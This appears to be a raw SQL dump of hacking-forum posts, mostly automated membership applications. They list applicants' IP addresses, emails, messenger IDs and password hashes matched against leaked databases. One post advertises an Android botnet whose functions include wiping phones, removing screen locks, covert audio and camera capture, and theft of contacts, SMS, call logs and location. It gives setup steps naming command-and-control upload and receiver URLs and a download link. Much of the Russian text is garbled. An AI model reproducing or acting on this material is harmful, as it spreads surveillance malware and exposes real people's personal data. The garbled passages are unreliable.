(1466, 1326, 0, 'Invite', 2, 'New invite', 1407519732, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: \n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : : : : \n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1383, 1234, 1369, 'w0rm', 1, '', 1407466699, 'ßþчøÑÂтøû ñô þт ýõðúтøòð, ø ôþñðòøû ÿðру фуýúцøù ò фþрüу ÿþôðчø ÷ðÑÂòþú:\n\n- mult: [B]ÿþûõ ÿрþòõрющõõ ýõ ÿþôðòðûðÑÂÑŒ ûø ÷ðÑÂòúð рðýьшõ [/B] \n ÿрø ÿðôðчõ ÷ðÑÂòúø уÑÂтðýðòûøòðютÑÂÑ ÑÂÿõцúуúø c øýôøúðтþрþü.\n\n- ip:[B] ÿрþòõрÑÂõт тõúущøù øÿ.[/B]\n\n- User agent: [b]тõúущøù ю÷õр ðóõýт.[/b]', 1, 0, '', 0, 1, 0, 0, 0),
(1476, 1335, 0, 'syslink', 13, 'Android botnet', 1407661639, 'Functions ::\r\n1) Reboot Device\r\n2) Shutdown Device\r\n3) Wipe Device\r\n4) Wipe Device AND External Memory (eg. Sdcard)\r\n5) Remove Screen Protection (eg Patterns, Pins and Codes to unlock Screen)\r\n6) Install APK as System App (USE WITH CAUTION!)\r\n7) Take a Screenshot\r\n8] Get List of Installed Packages\r\n9) Record Audio on the Device\r\n10) Take Picture (Back Camera)\r\n11) Take Picture (Front Camera [ IF EXISTING! ] )\r\n12) Zip File Directory and send all to Server (Directory: /sdcard/Android/data/settings/ )\r\n13) Disable ADB on Device\r\n14) Sends Contacts to the Server\r\n15) Gets all SMS from the Device\r\n16) Gets the Device\'s Call-Log\r\n17) Gets the Device\'s Browser Bookmarks (Default Browser)\r\n18) Gets the current Location of the Device\r\n19) ROOTED PHONE!# Sends a SU request to the Device (usefull for enabling SU rights on the Device)\r\n20) GET DEVICE ADMIN\r\n21) Roots the Device (Gingerbread and below)\r\n\r\nÃâ€Ã»Ñ Ñ‚õх úтþ ýõ ò тõüõ úðú ÑÂþñрðть ø ÿþÑÂтðòøть :\r\nÚþрþчõ òõñ ÿðýõûь ýðÿøÑÂðýð Ѡøÿþûь÷þòðýøõü CodeIgniter(MVC фрõùüòþрú PHP), ÑÂðü ñþт ýðÿøÑÂðý ýð java, ÿрþõúт ÑÂþ÷ôðý ò Eclipse.\r\n \r\nÚðú уÑÂтðýþòøть ø ÿрþòõрøть рðñþтþÑÂÿþÑÂþñýþÑÂть :\r\n \r\n1) Þтúрыòðõü WebPanel\\application\\config\\config.php ÷ðüõýÑÂõü тðü\r\n$config[\'base_url\'] = \'http://www.lucideustech.in/androidcp/\'; - ÿуть ôþ ýðшõù ÿðýõûьúø\r\n2) þтúрыòðõü \\WebPnel\\files\\alex.sql ýðхþôøü ÑÂтрþчúу INSERT INTO `tbl_user` VALUES(1, \'admin\', \'MD5 ENCRYPTED PASSWORD\'); óôõ MD5 ENCRYPTED PASSWORD - Ñ…ÑÂш ýðшõóþ ÿðрþûѠò md5\r\n3) áþ÷ôðõü ñð÷у ø úþрþчõ òыÿþûýÑÂõü ÑÂтþт sql òышõ чтþ øôõт\r\n4) WebPanel\\application\\config\\database.php - ýðÑÂтрþùúø ñô ÿþô ÑÂõñѠúþрþчõ ÿõрõÿøÑÂыòðõü\r\n5) áþ÷ôðõü ÿрþõúт ôûѠðýôрþøôð ÿþÑÂрõôÑÂтòþü øüÿþртð ø÷ ÑÂущõÑÂтòующøх øÑÂхþôýых úþôþò ò Eclipse.\r\n6) øщõü фðùûы constants.java üõýÑÂõü ÑÂтрþúу public static String AUTOROOTDL = \"http://www.lucideustech.in/androidcp/files/autoroot/\"; ýð ðôрõѠÑÂòþõù ÿðýõûьúø\r\nтðúöõ ø Ѡфðùûðüø uploader.java ::\r\nString urlServer = \"http://www.lucideustech.in/androidcp/device/upload\"; \r\nsender.java ::\r\nString URL = \"http://www.lucideustech.in/androidcp/device/receiver\"; \r\n\r\n[url]https://www.sendspace.com/file/qaqh0a[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1468, 1234, 1369, 'w0rm', 1, '', 1407520698, '×ðÿøûøû фøûьтðцøю ø ÿðру фøшõú ÿþ ðòтþ ÿрþñøòу.\n_ttp://w0rm.in:8888/showthread.php?t=1327\n\nCõùчðѠñуôу ÷ðщøщðть þт ÿþòтþрýых ÿþôðчь ÷ðÑÂòþú ÑÂðüу фþрüу.', 1, 0, '', 0, 1, 0, 0, 0),
(1469, 1328, 0, 'Invite', 2, '{$name}', 1407594801, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Emailkkkkkkkk\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: 46.146.211.11\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1470, 1329, 0, 'Invite', 2, '{$name}', 1407611611, '[SIZE=\'4\'][COLOR=\'Sienna\']ReVOLVeR[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 445342\n[b]e-mail[/b]: joe_123@mail.ru\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 217.115.50.229\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Revolver : revolver@smtp.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://revolver.com.au | revolver.com.au \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1471, 1330, 0, 'Invite', 2, '{$name}', 1407613019, '[SIZE=\'4\'][COLOR=\'Sienna\']test[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: treedfg\n[b]e-mail[/b]: tesyesggmm\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.146.211.11\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Test : test@test.com : 80.93.122.2 : bb5a3fcb975122642d8a9f59608c01a9\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://test.de | test.de \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1391, 1234, 1383, 'w0rm', 1, '', 1407469060, '[B]up[/B]\nôþñðòøû [B]Referer[/B]', 1, 0, '', 0, 1, 0, 0, 0),
(1464, 1324, 0, 'Invite', 2, 'New invite', 1407519306, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: \n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : : : : \n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1465, 1325, 0, 'Invite', 2, 'New invite', 1407519374, '[b]Name[/b]: izg0y\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: \n\n[b]Name[/b] : Izg0y : Izg0y1@gmail.com : 95.30.193.97 : 32d1821827468511bcb77c1b26cc12a3\n[b]E-Mail[/b] : : : : \n[b]IP[/b] : : : : \n \n[b]name[/b]: https://exploit.in/forum/index.php?showuser=49176 | https://exploit.in/forum/index.php?showuser=49176', 1, 0, '', 0, 1, 0, 0, 0),
(1453, 1313, 0, 'Invite', 2, 'New invite', 1407516189, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1450, 1310, 0, 'Invite', 2, 'New invite', 1407503526, '///////////////////////////////////////////////////////////////////////\n///[b]Name[/b]: Nick\n///[b]ICQ/Jabber[/b]: ICQ/Jabber\n///[b]e-mail[/b]: Email\n///[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n///[b]Mult[/b]: 50.7.210.37\n///[b]Ip[/b]: 158.255.211.156\n///[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n///[b]Referer[/b]: https://www.google.ru/\n/////////////////////////////////////////////////////////////////////// \n In leaked BDs:\n \n [b]Name[/b] : lesnick : roman_30@ukr.net : 212.82.211.155 : 4362005791776a2f3704754fe9e75193\n [b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n [b]IP[/b] : : : : \n \n [b]In google[/b] : \n [b]name[/b]: http://nick.typepad.com | nick.typepad.com', 1, 0, '', 0, 1, 0, 0, 0),
(1463, 1323, 0, 'Invite', 2, 'New invite', 1407518305, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : : : : \n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1454, 1314, 0, 'Invite', 2, 'New invite', 1407517045, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1455, 1315, 0, 'Invite', 2, 'New invite', 1407517220, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: 50.7.210.37\n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1456, 1316, 0, 'Invite', 2, 'New invite', 1407517231, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1457, 1317, 0, 'Invite', 2, 'New invite', 1407517654, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1458, 1318, 0, 'Invite', 2, 'New invite', 1407517680, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1459, 1319, 0, 'Invite', 2, 'New invite', 1407517693, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1460, 1320, 0, 'Invite', 2, 'New invite', 1407517746, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1461, 1321, 0, 'Invite', 2, 'New invite', 1407517755, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1462, 1322, 0, 'Invite', 2, 'New invite', 1407518217, '[b]Name[/b]: Nickname\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n\n[b]Mult[/b]: \n[b]Ip[/b]: 158.255.211.156\n[b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[b]Referer[/b]: https://www.google.ru/\n\n[b]Name[/b] : : : : \n[b]E-Mail[/b] : washa2010@googlemail.com : dos : 127.0.0.1 : 759b3f4f2f10b6f149da0b62b30b3bd7\n[b]IP[/b] : : : : \n \n[b]name[/b]:', 1, 0, '', 0, 1, 0, 0, 0),
(1420, 1234, 1369, 'w0rm', 1, '', 1407476078, 'ÿрøúрõÿøû ÿþøÑÂú ÿþ ÑÂûøтыü ñô ÿрø ÿþôðчõ ÷ðÑÂòúø.\r\n\r\nâðú тõÿõрь òыóÃȄÂôøт рõ÷уûьтðт ÿþôðýýþù ÷ðÑÂòúø c w0rm.in\r\n\r\n[URL=http://hostingkartinok.com/show-image.php?id=77b35fc47b6053c9335bf9f4f6b76696][IMG]http://s7.hostingkartinok.com/uploads/thumbs/2014/08/77b35fc47b6053c9335bf9f4f6b76696.png[/IMG][/URL]', 1, 0, '', 0, 1, 0, 0, 0),
(1421, 1281, 0, 'Invite', 2, 'New invite', 1407478239, '[b]Name[/b]: karp\n [b]ICQ/Jabber[/b]: 661615739\n [b]e-mail[/b]: pkarepin@mail.ru\n [b]Info[/b]: Hi!\r\n\r\n1. SQL/XSS/CSRF/PHPinj and etc vuln.\r\n\r\n2. PL:PHP,python.\n \n [b]Mult[/b]: \n [b]Ip[/b]: 37.235.53.148\n [b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n [b]Referer[/b]: http://www.w0rm.in/index.php?site=joinus\n \n \n Search results:\n \n [b]Name[/b]\n [php]\n genadiikarpenya : genadii_karpenya@mail.ru : 89.178.191.19 : 4f68071251dc320ff7cb4957706281eb\n [/php]\n [b]E-Mail[/b]\n [php]\n : : : \n [/php]\n [b]IP[/b]\n [php]\n : : : \n [/php]\n -------------------------------', 1, 0, '', 0, 1, 0, 0, 0),
(1474, 1333, 0, 'Invite', 2, '{$name}', 1407650671, '[SIZE=\'4\'][COLOR=\'Sienna\']methamphetamine[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: loco@jabber.se\n[b]e-mail[/b]: mrx80@gmx.com\n[b]Info[/b]: system hijack-ing passionate, meth lover, from time to time digital products seller, post forum.antichat.ru registered - user remember - password or email for registration forgotten.\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 174.143.244.15\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1467, 1327, 0, 'Invite', 2, 'New invite', 1407520443, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email2222222\n[b]Info[/b]: *The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.255.211.156\n[*][b]real ip[/b]: 50.7.210.37\n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1472, 1331, 0, 'Invite', 2, '{$name}', 1407631652, '[SIZE=\'4\'][COLOR=\'Sienna\']mjrod5[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: dn44@jodo.im\n[b]e-mail[/b]: dasdasz3@yandex.com\n[b]Info[/b]: Experience in coding in C++,ASM,delphi malware related projects. I can code in js/php.\r\nI have experience in web application security, SQLi (waf bypassing), advanced exploitation of xss,xxe,lfi,rfi,csrf,ssrf.\r\nhttp://www.ic0de.org/member.php?13265-mjrod5\r\nhttps://www.opensc.ws/members/mjrod5.html\r\nhttps://exploit.in/forum/index.php?showuser=49667\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 188.138.9.49\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mjrod5.deviantart.com | mjrod5.deviantart.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
